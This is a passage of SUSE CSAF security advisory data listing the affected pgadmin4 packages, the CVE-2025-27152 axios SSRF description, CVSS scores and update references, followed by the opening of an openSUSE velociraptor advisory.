"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-16T08:37:10Z",
"details": "important"
}
],
"title": "CVE-2024-4068"
},
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-16T08:37:10Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
}
]
}
opensuse-su-2025:15307-1
Vulnerability from csaf_opensuse
Published
2025-07-03 00:00
Modified
2025-07-03 00:00
Summary
velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media
Notes
Title of the patch
velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media
Description of the patch
These are all security issues fixed in the velociraptor-0.7.0.4.git163.87ee3570-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15307
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the velociraptor-0.7.0.4.git163.87ee3570-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15307",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
